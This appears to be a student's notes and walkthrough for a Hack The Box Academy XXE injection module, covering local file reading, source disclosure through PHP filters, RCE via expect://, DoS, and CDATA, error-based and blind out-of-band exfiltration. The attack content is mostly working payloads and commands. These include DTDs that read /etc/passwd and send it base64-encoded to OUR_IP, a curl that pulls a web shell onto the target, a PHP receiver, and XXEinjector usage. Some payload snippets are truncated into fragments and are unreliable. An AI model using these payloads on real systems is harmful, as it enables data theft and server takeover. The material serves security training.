# XML External Entity (XXE) Injection

| Key | Definition | Example |
| --- | --- | --- |
| `Tag` | The keys of an XML document, usually wrapped with (`<`/`>`) characters. | `<date>` |
| `Entity` | XML variables, usually wrapped with (`&`/`;`) characters. | `&lt;` |
| `Element` | The root element or any of its child elements; its value is stored between a start-tag and an end-tag. | `<date>01-01-2022</date>` |
| `Attribute` | Optional specifications for any element that are stored in the tags, which may be used by the XML parser. | `version="1.0"`/`encoding="UTF-8"` |
| `Declaration` | Usually the first line of an XML document; it defines the XML version and encoding to use when parsing it. | `<?xml version="1.0" encoding="UTF-8"?>` |

Furthermore, some characters are used as part of an XML document structure, like `<`, `>`, `&`, or `"`. So, if we need to use them in an XML document, we should replace them with their corresponding entity references (e.g. `&lt;`, `&gt;`, `&amp;`, `&quot;`). Finally, we can write comments in XML documents between `<!--` and `-->`, similar to HTML documents.

## Local File Disclosure

### Identifying

The first step in identifying potential XXE vulnerabilities is finding web pages that accept XML user input. We can start the exercise at the end of this section, which has a `Contact Form`:

If we fill the contact form and click on `Send Data`, then intercept the HTTP request with Burp, we get the following request:

As we can see, the form appears to be sending our data in an XML format to the web server, making this a potential XXE testing target. Suppose the web application uses outdated XML libraries, and it does not apply any filters or sanitization on our XML input. In that case, we may be able to exploit this XML form to read local files. If we send the form without any modification, we get the following message:

We see that the value of the `email` element is displayed back to us on the page. To print the content of an external file to the page, we should `note which elements are being displayed, such that we know which elements to inject into`. In some cases, no elements may be displayed; we will cover how to exploit that in the upcoming sections.

For now, we know that whatever value we place in the `<email></email>` element gets displayed in the HTTP response. So, let us try to define a new entity and then use it as a variable in the `email` element to see whether it gets replaced with the value we defined.

```xml
<!DOCTYPE email [
  <!ENTITY company "Inlane Freight">
]>
```

> Note: In our example, the XML input in the HTTP request had no DTD declared within the XML data itself or referenced externally, so we added a new DTD before defining our entity. If the `DOCTYPE` was already declared in the XML request, we would just add the `ENTITY` element to it.

Now, we should have a new XML entity called `company`, which we can reference with `&company;`. So, instead of using our email in the `email` element, let us try using `&company;`, and see whether it will be replaced with the value we defined (`Inlane Freight`):
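The substitution being tested here can also be reproduced offline. The following is a minimal sketch using Python's standard `xml.etree.ElementTree` parser, which is only a stand-in for whatever parser the target actually uses; the `root`/`email` element names and the `reflected_email` helper are assumptions made for illustration. It shows an internal entity being expanded at parse time, which is the behaviour we are probing for:

```python
import xml.etree.ElementTree as ET

# Hypothetical request body; the element names are assumed for illustration.
payload = """<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company "Inlane Freight">
]>
<root>
  <email>&company;</email>
</root>"""


def reflected_email(xml_text: str) -> str:
    """Parse the XML and return the text of the <email> element."""
    root = ET.fromstring(xml_text)
    return root.findtext("email")


if __name__ == "__main__":
    # The parser expands &company; before the application ever sees the value.
    print(reflected_email(payload))
```

If the application reflects the parsed value rather than the raw request text, the entity's value is what ends up on the page.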

As we can see, the response did use the value of the entity we defined (`Inlane Freight`) instead of displaying `&company;`, indicating that we may inject XML code. In contrast, a non-vulnerable web application would display `&company;` as a raw value. `This confirms that we are dealing with a web application vulnerable to XXE`.

> Note: Some web applications may default to a JSON format in HTTP requests, but may still accept other formats, including XML. So, even if a web app sends requests in a JSON format, we can try changing the `Content-Type` header to `application/xml`, and then convert the JSON data to XML with an [online tool](https://www.convertjson.com/json-to-xml.htm). If the web application does accept the request with XML data, then we may also test it against XXE vulnerabilities, which may reveal an unanticipated XXE vulnerability.

### Reading Sensitive Files

Now that we can define new internal XML entities, let's see if we can define external XML entities. Doing so is fairly similar to what we did earlier, but we'll add the `SYSTEM` keyword and define the external reference path after it, as we have learned in the previous section:

```xml
<!DOCTYPE email [
  <!ENTITY company SYSTEM "file:///etc/passwd">
]>
```

Let us now send the modified request and see whether the value of our external XML entity gets set to the file we reference:

We see that we did indeed get the content of the `/etc/passwd` file, `meaning that we have successfully exploited the XXE vulnerability to read local files`. This enables us to read the content of sensitive files, like configuration files that may contain passwords, or other sensitive files like the `id_rsa` SSH key of a specific user, which may grant us access to the back-end server. We can refer to the [File Inclusion / Directory Traversal](https://academy.hackthebox.com/course/preview/file-inclusion) module to see what attacks can be carried out through local file disclosure.

> Tip: In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.

### Reading Source Code

Local file disclosure may also let us read the source code of the web application. This would allow us to perform a `Whitebox Penetration Test` to unveil more vulnerabilities in the web application, or at the very least reveal secret configurations like database passwords or API keys. So, let us see if we can use the same attack to read the source code of the `index.php` file, as follows:

As we can see, this did not work, as we did not get any content. This happened because `the file we are referencing is not in a proper XML format, so it fails to be referenced as an external XML entity`. If a file contains some of XML's special characters (e.g. `<`/`>`/`&`), it would break the external entity reference and not be used for the reference.

Luckily, PHP provides wrapper filters that allow us to base64 encode certain resources (including files), in which case the final base64 output should not break the XML format. To do so, instead of using `file://` as our reference, we will use PHP's `php://filter/` wrapper. With this filter, we can specify the `convert.base64-encode` encoder as our filter, and then add an input resource (e.g. `resource=index.php`), as follows:

```xml
<!DOCTYPE email [
  <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
```

With that, we can send our request, and we will get the base64 encoded string of the `index.php` file:
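To make the reasoning above concrete, here is a small local sketch, again using Python's `xml.etree.ElementTree` as a stand-in parser. The `php_source` string, the element names, and the `wrap`/`parses` helpers are all hypothetical, and pasting the content into an element is only an approximation of how a parser includes an external entity. It shows that raw source containing `<` and `&` breaks parsing, while the base64 form survives and can be decoded back:

```python
import base64
import xml.etree.ElementTree as ET

# Hypothetical file content containing characters that are special in XML.
php_source = '<?php echo "hi"; ?>\n<p>Fish & Chips<br>'


def wrap(content: str) -> str:
    """Place content inside an element, roughly as an expanded entity would be."""
    return f"<root><email>{content}</email></root>"


def parses(xml_text: str) -> bool:
    """Return True if the text is well-formed XML, False otherwise."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


encoded = base64.b64encode(php_source.encode()).decode()

raw_ok = parses(wrap(php_source))   # the bare '&' and unclosed tags break the document
encoded_ok = parses(wrap(encoded))  # base64 only uses XML-safe characters

# Decoding the reflected value recovers the original source.
recovered = base64.b64decode(ET.fromstring(wrap(encoded)).findtext("email")).decode()
```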

We can select the base64 string, click on Burp's Inspector tab (on the right pane), and it will show us the decoded file. For more on PHP filters, you can refer to the [File Inclusion / Directory Traversal](https://academy.hackthebox.com/module/details/23) module.

`This trick only works with PHP web applications.`

### Remote Code Execution with XXE

In addition to reading local files, we may be able to gain code execution over the remote server. The easiest method would be to look for `ssh` keys, or to attempt a hash stealing trick in Windows-based web applications by making a call to our server. If these do not work, we may still be able to execute commands on PHP-based web applications through the `expect://` wrapper, though this requires the PHP `expect` module to be installed and enabled.

If the XXE directly prints its output (as shown in this section), then we can execute basic commands such as `expect://id`, and the page should print the command output. The most efficient method to turn XXE into RCE is to fetch a web shell from our server and write it to the web app, after which we can interact with it to execute commands. We start by writing the web shell and serving it over HTTP:

```shell-session
eldeim@htb[/htb]$ echo '' > shell.php
eldeim@htb[/htb]$ sudo python3 -m http.server 80
```

Now, we can use the following XML code to execute a `curl` command that downloads our web shell into the remote server:

```xml
<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
  <email>&company;</email>
</root>
```

> Note: We replaced all spaces in the above XML code with `$IFS`, to avoid breaking the XML syntax. Furthermore, many other characters like `|`, `>`, and `{` may break the code, so we should avoid using them.

Once we send the request, we should receive a request on our machine for the `shell.php` file, after which we can interact with the web shell on the remote server for code execution.

> Note: The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work. 
This is why XXE is usually used to disclose sensitive local files and source code, which may reveal additional vulnerabilities or ways to gain code execution.

### Other XXE Attacks

The [Server-Side Attacks](https://academy.hackthebox.com/course/preview/server-side-attacks) module thoroughly covers SSRF, and the same techniques can be carried out with XXE attacks.

Finally, one common use of XXE attacks is causing a Denial of Service (DoS) on the hosting web server, using the following payload:

```xml
]> &a10;
```

This payload defines the `a0` entity as `DOS`, references it in `a1` multiple times, references `a1` in `a2`, and so on, so that expanding `&a10;` grows exponentially until the back-end server's memory runs out. However, `this attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference`. Try it against this exercise, and see if it works.

### PoCs - Questions

* Try to read the content of the 'connection.php' file, and submit the value of the 'api\_key' as the answer

First, I intercept the request and inspect the body:

I can see that my email is reflected in the response, so I will try to confirm the XXE:

```
]>
```

Nice! Now I will try to make it return the `connection.php` file:

## Advanced File Disclosure

### Advanced Exfiltration with CDATA

To output data that does not conform to the XML format, we can wrap the content of the external file reference with a `CDATA` tag (e.g. `<![CDATA[ FILE_CONTENT ]]>`). This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.

One easy way to tackle this issue would be to define a `begin` internal entity with `<![CDATA[`, an `end` internal entity with `]]>`, and then place our external entity file in between, and it should be considered as a `CDATA` element, as follows:

```xml
<!DOCTYPE email [
  <!ENTITY begin "<![CDATA[">
  <!ENTITY file SYSTEM "file:///var/www/html/submitDetails.php">
  <!ENTITY end "]]>">
  <!ENTITY joined "&begin;&file;&end;">
]>
```

After that, if we reference the `&joined;` entity, it should contain our escaped data. However, `this will not work, since XML prevents joining internal and external entities`, so we will have to find a better way to do so.

To bypass this limitation, we can utilize `XML Parameter Entities`, a special type of entity that starts with a `%` character and can only be used within the DTD. What's unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows:

```xml
<!ENTITY joined "%begin;%file;%end;">
```

So, let's try to read the `submitDetails.php` file by first storing the above line in a DTD file (e.g. `xxe.dtd`), hosting it on our machine, and then referencing it as an external entity on the target web application, as follows:

```shell-session
eldeim@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
eldeim@htb[/htb]$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

Now, we can reference our external entity (`xxe.dtd`) and then print the `&joined;` entity we defined above, which should contain the content of the `submitDetails.php` file, as follows:

```xml
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference the external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
...
<email>&joined;</email> <!-- reference the &joined; entity to print the file content -->
```

Once we write our `xxe.dtd` file, host it on our machine, and then add the above lines to our HTTP request to the vulnerable web application, we can finally get the content of the `submitDetails.php` file:
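The effect of the `CDATA` wrapper itself can be checked locally. This is a minimal sketch with Python's `xml.etree.ElementTree` standing in for the target's parser. The `file_content` string, the element names, and the `email_text` helper are hypothetical, and the sketch only demonstrates how CDATA is parsed, not the parameter-entity joining done through the hosted DTD:

```python
import xml.etree.ElementTree as ET

# Hypothetical source snippet with characters that are special in XML.
# It must not contain "]]>", which would terminate the CDATA section early.
file_content = 'if ($a < $b && $c) { echo "<br>"; }'


def email_text(inner: str):
    """Return the parsed <email> text, or None if the document is malformed."""
    try:
        return ET.fromstring(f"<root><email>{inner}</email></root>").findtext("email")
    except ET.ParseError:
        return None


raw_result = email_text(file_content)                          # parser rejects '<' and '&'
cdata_result = email_text(f"<![CDATA[{file_content}]]>")       # treated as raw character data
```

The CDATA version comes back byte-for-byte, which is why the joined `begin`/`file`/`end` entities can carry source code through the parser.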

> Note: In some modern web servers, we may not be able to read some files (like index.php), as the web server would be preventing a DOS attack caused by file/entity self-reference (i.e., XML entity reference loop), as mentioned in the previous section.

This trick can become very handy when the basic XXE method does not work or when dealing with other web development frameworks. `Try to use this trick to read other files`.

### Error Based XXE

First, let's try to send malformed XML data, and see if the web application displays any errors. To do so, we can delete any of the closing tags, change one of them so that it does not close (e.g. `<roo>` instead of `<root>`), or just reference a non-existing entity, as follows:

To exfiltrate file content through such error messages, we will use a technique similar to the one we used earlier. First, we will host a DTD file that contains the following payload:

```xml
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
```

The above payload defines the `file` parameter entity and then joins it with an entity that does not exist. In our previous exercise, we were joining three strings. In this case, `%nonExistingEntity;` does not exist, so the web application would throw an error saying that this entity does not exist, along with our joined `%file;` as part of the error. Many other things can cause an error, like a bad URI or bad characters in the referenced file.

Now, we can call our external DTD script, and then reference the `error` entity, as follows:

```xml
<!DOCTYPE email [
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %error;
]>
```

Once we host our DTD script as we did earlier and send the above payload as our XML data (no need to include any other XML data), we will get the content of the `/etc/hosts` file as follows:

This method may also be used to read the source code of files. All we have to do is change the file name in our DTD script to point to the file we want to read (e.g. `"file:///var/www/html/submitDetails.php"`). However, `this method is not as reliable as the previous method for reading source files`, as it may have length limitations, and certain special characters may still break it.

### PoCs - Questions

* Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').

First, I tried a basic CDATA payload, but it did not work:

```
"> %xxe; ]>
```

So I tried an error-based XXE next, starting by deleting the `root` tags:

Nice! It did not return any error, so I created the DTD payload and hosted it:

```bash
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
python3 -m http.server 8000
```

Then I modified the request to reference my hosted DTD:

```xml
"> %xxe; ]> test 12345 &joined; test
```

> NOTE: we reference `&joined;`, which is the name of the entity defined in our hosted DTD

That did not work either, so I tried the error-based method and changed the URL to `/error/...`:

So now I'll generate a DTD, host it, and then call it from the request:

```bash
## Create exploit.dtd
">
## then
python3 -m http.server 8090
```

> NOTE: save the previous XML into `exploit.dtd`

```xml
%remote; %error; ]> &remote;
```

## Blind Data Exfiltration

For blind cases, where nothing is printed back to us, we can utilize a method known as `Out-of-band (OOB) Data Exfiltration`, which is often used in similar blind cases with many web attacks, like blind SQL injections, blind command injections, blind XSS, and of course, blind XXE. Both the [Cross-Site Scripting (XSS)](https://academy.hackthebox.com/course/preview/cross-site-scripting-xss) and the [Whitebox Pentesting 101: Command Injections](https://academy.hackthebox.com/course/preview/whitebox-pentesting-101-command-injection) modules discussed similar attacks, and here we will utilize a similar attack, with slight modifications to fit our XXE vulnerability.

In our previous attacks, we utilized an `out-of-band` attack since we hosted the DTD file on our machine and made the web application connect to us (hence out-of-band).

### Out-of-band Data Exfiltration

To exfiltrate data this way, we can first use a parameter entity for the content of the file we are reading while utilizing the PHP filter to base64 encode it. Then, we will create another external parameter entity, point it at our IP, and place the `file` parameter value as part of the URL being requested over HTTP, as follows:

```xml
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
```

If, for example, the file we want to read had the content of `XXE_SAMPLE_DATA`, then the `file` parameter would hold its base64 encoded data (`WFhFX1NBTVBMRV9EQVRB`). When the XML tries to reference the external `oob` parameter from our machine, it will request `http://OUR_IP:8000/?content=WFhFX1NBTVBMRV9EQVRB`. Finally, we can decode the `WFhFX1NBTVBMRV9EQVRB` string to get the content of the file. 
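The decoding step can be sketched in a few lines of Python. The `decode_exfiltrated` helper below is a hypothetical name introduced for illustration; it takes the URL that would appear in our web server log, pulls out the `content` parameter, and base64-decodes it:

```python
import base64
from urllib.parse import urlparse, parse_qs


def decode_exfiltrated(url: str) -> str:
    """Return the decoded value of the `content` query parameter."""
    query = parse_qs(urlparse(url).query)
    encoded = query["content"][0]
    # parse_qs turns '+' into a space, but '+' is a valid base64 character,
    # so restore it before decoding.
    encoded = encoded.replace(" ", "+")
    return base64.b64decode(encoded).decode()


if __name__ == "__main__":
    print(decode_exfiltrated("http://OUR_IP:8000/?content=WFhFX1NBTVBMRV9EQVRB"))
```

Restoring `+` matters for real files, since longer base64 strings often contain it and would otherwise decode incorrectly.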
We can even write a simple PHP script that automatically detects the encoded file content, decodes it, and outputs it to the terminal:

```php
<?php
// Decode the base64 data sent in the `content` parameter and log it to the terminal
if (isset($_GET['content'])) {
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>
```

So, we will first write the above PHP code to `index.php`, and then start a PHP server on port `8000`, as follows:

```shell-session
eldeim@htb[/htb]$ vi index.php # here we write the above PHP code
eldeim@htb[/htb]$ php -S 0.0.0.0:8000
```

Now, to initiate our attack, we can use a payload similar to the one we used in the error-based attack, and simply add `&content;` inside the root element, which is needed to reference our entity and have it send the request to our machine with the file content:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>
```

Then, we can send our request to the web application:

Finally, we can go back to our terminal, and we will see that we did indeed get the request and its decoded content:

```shell-session
PHP 7.4.3 Development Server (http://0.0.0.0:8000) started
10.10.14.16:46256 Accepted
10.10.14.16:46256 [200]: (null) /xxe.dtd
10.10.14.16:46256 Closing
10.10.14.16:46258 Accepted

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...SNIP...
```

> Tip: In addition to storing our base64 encoded data as a parameter to our URL, we may utilize `DNS OOB Exfiltration` by placing the encoded data as a sub-domain for our URL (e.g. `ENCODEDTEXT.our.website.com`), and then use a tool like `tcpdump` to capture any incoming traffic and decode the sub-domain string to get the data. Granted, this method is more advanced and requires more effort to exfiltrate data through.

### Automated OOB Exfiltration

Although in some instances we may have to use the manual method we learned above, in many other cases, we can automate the process of blind XXE data exfiltration with tools. One such tool is [XXEinjector](https://github.com/enjoiz/XXEinjector). This tool supports most of the tricks we learned in this module, including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE.

To use this tool for automated OOB exfiltration, we can first clone the tool to our machine, as follows:

```shell-session
eldeim@htb[/htb]$ git clone https://github.com/enjoiz/XXEinjector.git
Cloning into 'XXEinjector'...
...SNIP...
```

Once we have the tool, we can copy the HTTP request from Burp and write it to a file for the tool to use. 
We should not include the full XML data, only the first line, and write `XXEINJECT` after it as a position locator for the tool:

```http
POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.201.94
Content-Length: 169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://10.129.201.94
Referer: http://10.129.201.94/blind/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT
```

Now, we can run the tool with the `--host`/`--httpport` flags being our IP and port, the `--file` flag being the file we wrote above, and the `--path` flag being the file we want to read. We will also select the `--oob=http` and `--phpfilter` flags to repeat the OOB attack we did above, as follows:

```shell-session
eldeim@htb[/htb]$ ruby XXEinjector.rb --host=[tun0 IP] --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter

...SNIP...
[+] Sending request with malicious XML.
[+] Responding with XML for: /etc/passwd
[+] Retrieved data:
```

We see that the tool did not directly print the data. This is because we are base64 encoding the data, so it does not get printed. In any case, all exfiltrated files get stored in the `Logs` folder under the tool, and we can find our file there:

```shell-session
eldeim@htb[/htb]$ cat Logs/10.129.201.94/etc/passwd.log
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...SNIP..
```

Try to use the tool to repeat other XXE methods we learned.

### PoCs - Questions

* Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.

First, I captured the request and sent one to the `/blind` endpoint:

Then I tried to perform an OOB XXE. First, I created a DTD that reads the content of the file I wanted and applies a base64 filter to it:

```
">
```

Then I saved it as `oob_xxe.dtd`. Afterwards, I created a simple PHP script that automatically decodes any data I receive on port `8000`:

```
```

I saved it as `index.php`. Then I started a PHP server with:

```
php -S 0.0.0.0:8000
```

Now I modified the request to call the external entity and forward the output to my PHP server:

```
%remote; %oob;]>&content;
```
